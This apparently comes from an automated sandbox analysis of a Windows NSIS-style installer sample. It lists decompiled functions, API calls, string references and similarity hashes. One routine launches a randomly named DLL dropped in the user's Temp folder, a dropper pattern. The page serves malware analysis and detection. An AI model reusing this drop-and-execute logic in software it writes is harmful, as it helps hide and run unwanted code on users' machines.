            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Message$Send$ClientScreen
            • String ID: f
            • API String ID: 41195575-1993550816
            • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
            • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
            • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
            • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402BAB, Relevance: 9.0, APIs: 6, Instructions: 48timeCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
				int _t7;
				int _t15;
				struct HWND__* _t16;

				_t16 = _a4;
				if(_a8 == 0x110) {
					SetTimer(_t16, 1, 0xfa, 0);
					_a8 = 0x113;
					 *0x40b020 = _a16;
				}
				if(_a8 == 0x113) {
					_t15 =  *0x789930; // 0x4e6c2
					_t7 =  *0x79d938; // 0x4e6c6
					if(_t15 >= _t7) {
						_t15 = _t7;
					}
					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
					SetWindowTextA(_t16, 0x7898f0);
					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
					ShowWindow(_t16, 5);
				}
				return 0;
			}






            0x00402bb7
            0x00402bbf
            0x00402bcb
            0x00402bd4
            0x00402bd7
            0x00402bd7
            0x00402bdf
            0x00402be1
            0x00402be7
            0x00402bee
            0x00402bf0
            0x00402bf0
            0x00402c09
            0x00402c14
            0x00402c21
            0x00402c29
            0x00402c29
            0x00402c34

            APIs
            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
            • MulDiv.KERNEL32(0004E6C2,00000064,0004E6C6), ref: 00402BF6
            • wsprintfA.USER32 ref: 00402C09
            • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
            • SetDlgItemTextA.USER32 ref: 00402C21
            • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: TextWindow$ItemShowTimerwsprintf
            • String ID:
            • API String ID: 559026099-0
            • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
            • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
            • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
            • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401E34, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
            Download Yara Rule
            C-Code - Quality: 64%
            			E00401E34() {
				signed int _t7;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A9A(_t19);
				_t20 = E00402A9A(0x31);
				_t7 = E00402A9A(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA("C:\Users\jones\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll", "%s %s");
				E00401428(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}








            0x00401e3c
            0x00401e45
            0x00401e47
            0x00401e4c
            0x00401e4d
            0x00401e58
            0x00401e5a
            0x00401e65
            0x00401e71
            0x00401e7f
            0x00401e91
            0x004026da
            0x004026da
            0x00402932
            0x0040293e

            APIs
            • wsprintfA.USER32 ref: 00401E5A
            • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
            • C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll, xrefs: 00401E53
            • %s %s, xrefs: 00401E4E
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ExecuteShellwsprintf
            • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll
            • API String ID: 2956387742-2276065101
            • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
            • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
            • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
            • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402ADA, Relevance: 7.6, APIs: 5, Instructions: 51registryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t14;

				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
				if(_t14 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						if(E00402ADA(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					return RegDeleteKeyA(_a4, _a8);
				}
				return _t14;
			}






            0x00402af5
            0x00402afd
            0x00402b25
            0x00402b0f
            0x00402b56
            0x00000000
            0x00402b5e
            0x00402b23
            0x00000000
            0x00000000
            0x00402b23
            0x00402b3a
            0x00000000
            0x00402b46
            0x00402b50

            APIs
            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
            • RegCloseKey.ADVAPI32(?), ref: 00402B3A
            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
            • RegCloseKey.ADVAPI32(?), ref: 00402B56
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Close$DeleteEnumOpen
            • String ID:
            • API String ID: 1912718029-0
            • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
            • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
            • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
            • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401D32, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00401D32() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
				GetClientRect(_t25, _t27 - 0x40);
				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







            0x00401d3e
            0x00401d45
            0x00401d74
            0x00401d7c
            0x00401d83
            0x00401d83
            0x00402932
            0x0040293e

            APIs
            • GetDlgItem.USER32 ref: 00401D38
            • GetClientRect.USER32 ref: 00401D45
            • LoadImageA.USER32 ref: 00401D66
            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
            • DeleteObject.GDI32(00000000), ref: 00401D83
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
            • String ID:
            • API String ID: 1849352358-0
            • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
            • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
            • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
            • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404545, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
            Download Yara Rule
            C-Code - Quality: 35%
            			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);
			}













            0x0040454d
            0x00404551
            0x00404559
            0x0040455c
            0x0040455d
            0x0040455f
            0x00404561
            0x00404564
            0x00404564
            0x0040456b
            0x00404571
            0x00404571
            0x00404578
            0x00404583
            0x00404584
            0x00404587
            0x00404587
            0x00404594
            0x0040459f
            0x004045a2
            0x004045b4
            0x004045bb
            0x004045bc
            0x004045cb
            0x004045db
            0x004045f7

            APIs
            • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
            • wsprintfA.USER32 ref: 004045DB
            • SetDlgItemTextA.USER32 ref: 004045EE
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ItemTextlstrlenwsprintf
            • String ID: %u.%u%s%s
            • API String ID: 3540041739-3551169577
            • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
            • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
            • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
            • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401C19, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
            Download Yara Rule
            C-Code - Quality: 54%
            			E00401C19(void* __ecx) {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				_t46 = __ecx;
				 *(_t58 - 8) = E00402A9A(0x33);
				 *(_t58 + 8) = E00402A9A(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A9A();
					_t30 = E00402A9A();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A7D();
					_t39 = E00402A7D();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x34) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x34));
					E0040591D();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}













            0x00401c19
            0x00401c22
            0x00401c2e
            0x00401c31
            0x00401c3b
            0x00401c3b
            0x00401c3e
            0x00401c42
            0x00401c4c
            0x00401c4c
            0x00401c4f
            0x00401c53
            0x00401c55
            0x00401ca2
            0x00401ca4
            0x00401cad
            0x00401cb5
            0x00401cb8
            0x00401cb8
            0x00401cc1
            0x00000000
            0x00401c57
            0x00401c5e
            0x00401c60
            0x00401c68
            0x00401c6b
            0x00401c93
            0x00401cc7
            0x00401cc7
            0x00401c6d
            0x00401c7b
            0x00401c83
            0x00401c86
            0x00401c86
            0x00401c6b
            0x00401cca
            0x00401ccd
            0x00401cd3
            0x004028d7
            0x004028d7
            0x00402932
            0x0040293e

            APIs
            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$Timeout
            • String ID: !
            • API String ID: 1777923405-2657877971
            • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
            • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
            • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
            • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401E9C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49synchronizationCOMMON
            Download Yara Rule
            C-Code - Quality: 83%
            			E00401E9C() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A9A(_t24);
				E00404D62(0xffffffeb, _t13);
				_t15 = E00405247(_t28, "C:\\Users\\jones\\AppData\\Local\\Temp");
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405CFC(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x34) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E0040591D(_t26,  *(_t31 - 0x34));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







            0x00401ea2
            0x00401ea7
            0x00401eb2
            0x00401eb9
            0x00401ebc
            0x004026da
            0x00401ec2
            0x00401ec5
            0x00401ed6
            0x00401ed1
            0x00401ed1
            0x00401eeb
            0x00401ef4
            0x00401f04
            0x00401f06
            0x00401f06
            0x00401ef6
            0x00401efa
            0x00401efa
            0x00401ef4
            0x00401f0d
            0x00401f10
            0x00401f10
            0x00402932
            0x0040293e

            APIs
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
              • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
              • Part of subcall function 00405247: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
              • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
            • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
            • GetExitCodeProcess.KERNEL32 ref: 00401EEB
            • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 4003922372-47812868
            • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
            • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
            • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
            • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405247, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31processCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00405247(CHAR* _a4, CHAR* _a8) {
				struct _PROCESS_INFORMATION _v20;
				signed char _t10;
				int _t12;

				0x7a1588->cb = 0x44;
				_t10 = GetFileAttributesA(_a8);
				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
					_a8 = 0;
				}
				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
				if(_t12 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t12;
			}






            0x00405250
            0x0040525a
            0x00405265
            0x0040526b
            0x0040526b
            0x00405283
            0x0040528b
            0x00405290
            0x00000000
            0x00405296
            0x0040529a

            APIs
            • GetFileAttributesA.KERNEL32(?), ref: 0040525A
            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
            • CloseHandle.KERNEL32(?), ref: 00405290
            Strings
            • Error launching installer, xrefs: 00405247
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: AttributesCloseCreateFileHandleProcess
            • String ID: Error launching installer
            • API String ID: 2000254098-66219284
            • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
            • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
            • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
            • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004054CC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004054CC(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




            0x004054cd
            0x004054e4
            0x004054ec
            0x004054ec
            0x004054f4

            APIs
